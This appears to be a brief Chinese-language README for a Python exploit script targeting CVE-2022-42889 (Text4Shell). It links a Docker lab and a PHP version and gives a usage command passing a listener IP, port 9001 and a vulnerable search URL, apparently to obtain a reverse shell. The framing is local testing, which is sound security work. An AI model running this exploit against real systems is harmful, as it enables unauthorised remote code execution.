CVE-2022-42889 的 Python 脚本
要在本地测试,请按照 Docker POC 操作:https://github.com/karthikuj/cve-2022-42889-text4shell-docker
PHP 版本见:https://github.com/ClickCyber/cve-2022-42889
如果你在本地运行并利用此漏洞,需要使用的 IP 是 Docker 容器创建时生成的网关地址。
获取 Docker 容器的 bash shell 后:

确保使用 chmod 使脚本可执行:
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

NVD:https://nvd.nist.gov/vuln/detail/CVE-2022-42889